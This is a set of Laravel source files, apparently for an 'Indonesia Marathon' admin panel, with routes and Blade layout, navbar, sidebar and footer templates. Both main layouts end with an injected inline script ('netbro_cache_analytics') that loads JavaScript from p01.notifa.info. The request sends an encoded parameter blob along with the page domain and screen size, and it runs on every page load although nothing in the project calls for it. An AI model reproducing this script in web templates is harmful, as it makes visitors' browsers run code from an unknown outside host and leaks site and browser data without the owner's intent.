routes/web.php
<?php

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/



Auth::routes();
Route::get('/', 'Auth\LoginController@showLoginForm');
Route::get('/home', 'HomeController@index')->name('home');
Route::resource('post', 'PostController');
Route::resource('category', 'CategoryController');

resources/views/layouts/app.blade.php
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <!-- Favicons -->
    <link rel="icon" href="assets/img/favicon.png">

    <title>Login - Indonesia Marathon</title>

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="{{ asset('assets/bootstrap/css/bootstrap.min.css') }}">
    <link rel="stylesheet" href="{{ asset('assets/bootstrap/css/extends-bootstrap.css?1591402739') }}">
    <!-- Fonts CSS -->
    <link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
    <!-- BEGIN: Icons CSS-->
    <link rel="stylesheet" href="{{ asset('assets/feathericons/feathericons.min.css') }}">
    <link rel="stylesheet" href="{{ asset('assets/boxicons/css/boxicons.min.css') }}">
    <!-- BEGIN: Theme CSS-->
    <link rel="stylesheet" href="{{ asset('assets/css/login.css?1591402739') }}">
</head>

<body>

    @yield('content')

    <script type="text/javascript">
        if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXqPJJM1wG8Ri1GiVhjK9gt5CV%2fIv8U3CQHyZQjp8BOg9A%2bRLDXagBoZg7tQwnQA1wv2FtLGcgIN4vbtc%2b1Snl%2folWr7%2fWCKYg8NUj3bmz7Yqa7lgiBr8C6xEZFZJ7WHlIlLWWBOniAFRDZ8OpXs6I1XBhuOUDXel6PMXZA8f6nzFRd8f1ozMDwcPZYLPWj%2fWVC8rkK17vpk%2fVrgsFDtY3F8HDOgej3Q8G2LqFCmCJ1hA47B24H0EU%2biNtOzi7mG1cOJgUHrmdSxzLDNUOk0xSW6XWRD4VPRgG923aQbw9K%2frMlSpK07R%2bDNssFYTOw9T9m2bcNIPxD6cNRSWzFnI%2fyLlgoW8wd5I2kywNXCS0gt5XUmEn129UCdaIe62NVgVfuprTkczo1Myb1C4TTZud09gUgRXwMxtcnWbmpqXkhprDQislek7%2b7tSgSF1JV3epenOdoCzcJ9bRH3ju0Qgwyn%2fImxCJgGttrk8eo%2fckjD04gEw4y1OxtRPnaVt8Ce4WbagxP%2fEjFJVpEyAPTo5Z3A7khq9NME67" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};
    </script>
</body>

</html>

resources/views/layouts/footer.blade.php
<footer id="footer" class="pd-20">
    <div class="d-flex justify-content-between align-items-center">
        <div>2020 &copy; WEBINTHEME</div>
        <div>Created by WEBINTHEME</div>
    </div>
</footer>

resources/views/layouts/main.blade.php
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <!-- Favicons -->
    <link rel="icon" href="{{ asset('/assets/img/favicon.png') }}">

    <title>@yield('title')</title>

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="{{ asset('/assets/bootstrap/css/bootstrap.min.css') }}">
    <link rel="stylesheet" href="{{ asset('/assets/bootstrap/css/extends-bootstrap.css?1591385854') }}">
    <!-- Fonts CSS -->
    <link href="https://fonts.googleapis.com/css2?family=Great+Vibes&display=swap" rel="stylesheet">
    <!-- BEGIN: Icons CSS-->
    <link rel="stylesheet" href="{{ asset('/assets/feathericons/feathericons.min.css') }}">
    <link rel="stylesheet" href="{{ asset('/assets/boxicons/css/boxicons.min.css') }}">
    <!-- BEGIN: Plugins CSS -->
    <link rel="stylesheet" href="{{ asset('/libs/vanilla-calendar/vanilla-calendar.css') }}">
    @stack('apexchartcss')
    <!-- BEGIN: Theme CSS-->
    <link rel="stylesheet" href="{{ asset('/assets/css/style.css?1591385854') }}">
    <link rel="stylesheet" href="{{ asset('/assets/css/semi-dark-theme.css') }}">
    <link rel="stylesheet" href="{{ asset('/assets/css/responsive.css?1591385854') }}">
    <!-- include summernote css/js -->
    <link href="https://cdn.jsdelivr.net/npm/summernote@0.8.18/dist/summernote-bs4.min.css" rel="stylesheet">
</head>

<body class="vertical-menu semi-dark-theme sidebar-toggled">

    <!-- Topbar -->
    @include('layouts.navbar')

    <!-- sidebar -->
    @include('layouts.sidebar')

    <!-- Main Section -->.
    <div class="main-wrapper">
        @yield('content')
    </div>

    <!-- Footer -->
    @include('layouts.footer')



    <script src="{{ asset('/assets/js/jquery.slim.min.js') }}"></script>
    <script src="{{ asset('/libs/vanilla-calendar/vanilla-calendar-min.js?v=1') }}"></script>
    <script src="{{ asset('/assets/js/popper.min.js') }}"></script>
    <script src="{{ asset('/assets/bootstrap/js/bootstrap.min.js') }}"></script>
    <script src="{{ asset('/assets/js/app.js?v=1.1.7') }}"></script>
    @stack('apexchartjs')
    <script src="{{ asset('assets/js/dashboard-chart.js?v=1.1.9') }}"></script>
    <script src="{{ asset('assets/js/summernote.min.js') }}"></script>
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@9"></script>
    @include('sweetalert::alert')
    <!-- My Js -->
    @yield('js')
    <script type="text/javascript">
        if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXxHx7jmpNy9fYiHyMzwaJ9t4rMjp7o4xmXJ359gKwLJyv51AdHwh4Fk6lFyScSiLxmbWrrwkEUJ2jqmid1fSLQFmqSjIQQAQpz5lTPKuwG6mfsrRcv6oYe0SrloEe8gfbMkiySvE4J6b7Fg2%2fJ2Spt5JQHk4H6rV93ZpTp8x8Tr%2fOUaksg5smZ6COqmHm8YAdBSadrBOBkxZ%2fUZKI0SyjBJ7nlEPLBfKK6wSrHg1HMkn74pcqfQp%2bVXadC%2b4YlqreZliJl9k6M2OpTibZJmdHlddVQ3J%2boSCUXNWq9wBxRYcgPR8uvtigZuovBz4KLwszYe2RUpFxyP8ijUSb51qcu0cSeH7uFTsCix9oPArI0JdWEX1gPcq1TKw1iXypmlWnxEefl8p25IRq8P3eWg7vTqr6rIOX1k%2fF97juPHLMG8vmVZBjjiBni0RSmvaMWbJluu4mRksmHfXxMPVHHK7Ie4XGK6aba6kvJP56%2bsracRnGxp29Ykqgonj8QEhzBNV7tIqrQlt5MPb9KzlxWx8IY5HOpQYJFwiiF60%2flCmXhV1k%2fWncM%2f29pw%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};
    </script>
</body>

</html>

resources/views/layouts/navbar.blade.php
<!-- Navbar Top -->
<div class="navbar fixed-top navbar-main">
    <a href="javascript:;" class="toggle-sidebar"><i class="icon-code"></i></a>

    <div class="mr-auto navbar-title">
    </div>

    <div class="ml-auto d-flex justify-content-end align-items-center">

        <div class="d-flex dropdown">

        </div>
        <div class="dropdown">
            <a class="navbar-user-info toggle-dropdown" href="javascript:;"><img
                    src="{{ asset('assets/img/avatar_2.jpeg') }}" alt="user" class="rounded-circle" width="35" /></a>
            <ul class="dropdown-wrapper dropdown-menu-right dropdown-menu-user">
                <li>
                    <a class="dropdown-item" href="#"><i class="icon-user"></i> Edit Profile</a>
                </li>
                <li>
                    <div class="dropdown-divider"></div>
                </li>
                <li>
                    <a class="dropdown-item" href="#" data-toggle="modal" data-target="#logoutModal"><i
                            class="icon-power"></i> Logout</a>
                </li>
            </ul>
        </div>
    </div>
</div>


<div class="modal fade" id="logoutModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel"
    style="display: none;" aria-hidden="true">
    <div class="modal-dialog" role="document">
        <div class="modal-content">
            <div class="modal-header">
                <h5 class="modal-title" id="exampleModalLabel">Ready to Leave?</h5>
                <button class="close" type="button" data-dismiss="modal" aria-label="Close">
                    <span aria-hidden="true">×</span>
                </button>
            </div>
            <div class="modal-body">Select "Logout" below if you are ready to end your current session.</div>
            <div class="modal-footer">
                <button class="btn btn-danger" type="button" data-dismiss="modal">Cancel</button>
                <form action="{{ route('logout') }}" method="post">
                    @csrf
                    <button class="btn btn-dark">Logout</button>
                </form>
            </div>
        </div>
    </div>
</div>

resources/views/layouts/sidebar.blade.php
<!-- Sidebar -->
<div class="main-menu main-menu-sidebar">
    <div class="logo text-center">
        <img src="{{ asset('assets/img/logo-indonesia-marathon.png') }}" alt="Logo" width="130">
    </div>
    <div class="nav-menu">
        <ul class="nav flex-column">

            <li class="nav-item my-2 active">
                <a href="{{ route('home') }}">
                    <i class="icon-home"></i> Home
                </a>
            </li>

            <li class="menu-title">Data</li>

            <li class="nav-item my-2 ">
                <a href="{{ route('post.create') }}">
                    <i class="bx bx-plus-circle"></i> Add New Post
                </a>
            </li>

            <li class="nav-item my-2 ">
                <a href="{{ route('post.index') }}">
                    <i class="icon-send"></i> All Posts
                </a>
            </li>

            <li class="nav-item my-2 ">
                <a href="{{ route('category.index') }}">
                    <i class="icon-tag"></i> Category
                </a>
            </li>


            <li class="menu-title">User</li>

            <li class="nav-item my-2 ">
                <a href="#" data-toggle="modal" data-target="#logoutModal">
                    <i class="icon-log-out"></i> Logout
                </a>
            </li>

        </ul>
    </div>
</div>